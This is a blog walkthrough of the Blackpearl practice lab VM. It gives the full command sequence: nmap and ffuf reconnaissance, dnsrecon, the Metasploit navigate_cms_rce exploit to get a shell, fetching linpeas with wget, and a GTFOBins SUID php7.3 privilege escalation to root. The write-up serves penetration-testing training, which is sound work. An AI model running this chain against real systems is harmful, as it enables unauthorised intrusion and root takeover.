Blackpearl Walkthrough

babsarena

Babs

Posted on September 1, 2024

Blackpearl Walkthrough

After turning on our Blackpearl machine, We log in with the details:
Username: root
Password: tcm

To get our IP address, we input the command:

dhclient

Enter fullscreen mode Exit fullscreen mode

Then input the command:

ifconfig

Enter fullscreen mode Exit fullscreen mode

Image description

Now that our IP address has been gotten, we go to our kali machine and ping the blackpearl machine in other to confirm that they can communicate with each other.
Use the command:

ping 192.168.158.129 -c3

Enter fullscreen mode Exit fullscreen mode

NB- Remember to change the IP address to your Blackpearl"s IP address.

Image description

From the image above, we can see that they are both able to communicate, so next we run an NMAP scan using the command:

nmap -p- -A 192.168.158.129

Enter fullscreen mode Exit fullscreen mode

Image description

From the image above, we can see that 3 ports are open, including port 80 so we try to visit the default webpage using the IP address of the machine.

So from our firefox browser we visit the webpage *"192.168.158.129"
*

Image description

Right click and click on view page source

Image description

From the view page source we found something written as alek@blackpearl.tcm as seen from the below, so we would note that down somewhere.

Image description

I couldn't find anything else from the page so my next step now is to try to find hidden directories on the page using ffuf.
Use the command:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.158.129/FUZZ

Enter fullscreen mode Exit fullscreen mode

So we found an hidden directory called secret as seen below

Image description

So we move back to our browser and visit the webpage:

192.168.158.129/secret

Enter fullscreen mode Exit fullscreen mode

After visiting that page, we got a file, downloaded it, opened it and it was of no help.

Image description

From our opened ports we remember that port 53 for DNS is open so now we try to do some recon on it.
Use the command:

dnsrecon -r 127.0.0.0/24 -n 192.168.182.148 

Enter fullscreen mode Exit fullscreen mode

NB- After the "-n" input your blackpearl machine's IP address

Image description

So it found that there is dns pointer record to blackpearl.tcm, remember before that we found alek@blackpearl.tcm.
So now we need to go and add that to our DNS host.
Use the command:

nano /etc/hosts

Enter fullscreen mode Exit fullscreen mode

Image description

Image description

Now input the IP address of your blackpearl machine and the domain name blackpearl.tcm as seen in the image above, save and exit.

Now on your browser, visit the page:

http://blackpearl.tcm

Enter fullscreen mode Exit fullscreen mode

Image description

So after much enumerations I decided to search the blackpearl.tcm for hidden directories using the command:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ

Enter fullscreen mode Exit fullscreen mode

Image description

Image description

As seen from the image above, a hidden directory of navigate was found.

So now we navigate to navigate (pun intended lol)

On your web browser visit the page:

http://blackpearl.tcm/navigate/

Enter fullscreen mode Exit fullscreen mode

Image description

A navigatecms web page was displayed, So I searched online for navigate cms exploit.

Image description

Click on the option found above.

Image description

Image description

The description fits the version of navigate we are trying to exploit.

Image description

To use this we have to turn on metasploit on our kali and to turn it on, use the command:

msfconsole

Enter fullscreen mode Exit fullscreen mode

Image description

Use the command as seen from the image below
Image description

So copy " use exploit/multi/http/navigate_cms_rce " and paste on your msfconsole.

Image description

Input the command:

options

Enter fullscreen mode Exit fullscreen mode

Now we need to set the rhosts and vhost.
Input the command:

set rhosts 192.168.182.148

Enter fullscreen mode Exit fullscreen mode

and

set vhost blackpearl.tcm

Enter fullscreen mode Exit fullscreen mode

Image description

Input the command *options * again to confirm.

Image description

Now input the command:

run

Enter fullscreen mode Exit fullscreen mode

Image description

A shell has been popped.
Input the command:

shell

Enter fullscreen mode Exit fullscreen mode

Image description

A shell has been successfully created but it is looking different that what we are used to, because it is supposed to show us a user@something for instance and it's not.

So we need to generate what is known as a tty shell, so we search google for tty shell and click on the result seen below.

Image description

Image description

I prefer to use python so I need to confirm if python is available on the machine, so in the shell we popped, input the command below to verify if python is present in the machine:

which python

Enter fullscreen mode Exit fullscreen mode

Image description

The image above proves that python is present.
So copy the command for python.

Image description

Now edit it to the command seen below, because I want to use bash and not sh:

python -c 'import pty; pty.spawn("/bin/bash")'

Enter fullscreen mode Exit fullscreen mode

Now paste the above command in the shell.

Image description

Now a proper shell has been popped and we need to do some privilege escalation because we are a low level user.
For this we are going to use linpeas.

I already have linpeas downloaded so I need to open another tab on my kali and host up a web server in the directory that my linpeas is located in.

Image description

NB- You can comment below if you do not have linpeas download and I,d show you how, and also a previous write up of mine already covered that.

So after moving to the directory that your linpeas is located, input the following command:

python3 -m http.server 80

Enter fullscreen mode Exit fullscreen mode

Image description

Then on your shell tab, input the following command:

wget http://192.168.182.129/linpeas.sh linpeas.sh 

Enter fullscreen mode Exit fullscreen mode

Image description

Linpeas has been successfully airdropped.
Input the command below to confirm:

ls

Enter fullscreen mode Exit fullscreen mode

Image description

Now to be able to run linpeas, input the command:

chmod +x linpeas.sh

Enter fullscreen mode Exit fullscreen mode

and run it using the command:

./linpeas.sh

Enter fullscreen mode Exit fullscreen mode

Image description

When looking through linpeas, we majorly focus on anything with the colour red or yellow.

Image description

For this particular box, we are majorly focusing on the s we can see highlighted in the image above.
Now if you are familiar with permissions, you'd know we are supposed to have just r-w-x which stands for read, write and execute respectively.

But in the space permission for root we are seeing S which means we can run the binary as root and abuse the feature.

Input the command below to see all the permissions we can run as root and abuse in a much cleaner setting:

find / -type f -perm -4000 2>/dev/null

Enter fullscreen mode Exit fullscreen mode

Image description

Now visit the website gtfobins on your browser

Image description

Select SUID

Image description

Scroll down and then select php because that is the only option we have that's present from the permissions we are allowed to run as root.

After clicking on php, scroll down and look for suid.

Image description

Now we are only going to copy the command highlighted in the image below, because we need called out the binary specifically because it is not just php, ours is php 7.3 and we need to involve the file path.

So input the command:

/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"

Enter fullscreen mode Exit fullscreen mode

Image description

Once that has been executed, input the command:

whoami

Enter fullscreen mode Exit fullscreen mode

Image description

As you can see, we have become ROOT!

Image description

đź’– đź’Ş đź™… đźš©
babsarena
Babs

Posted on September 1, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related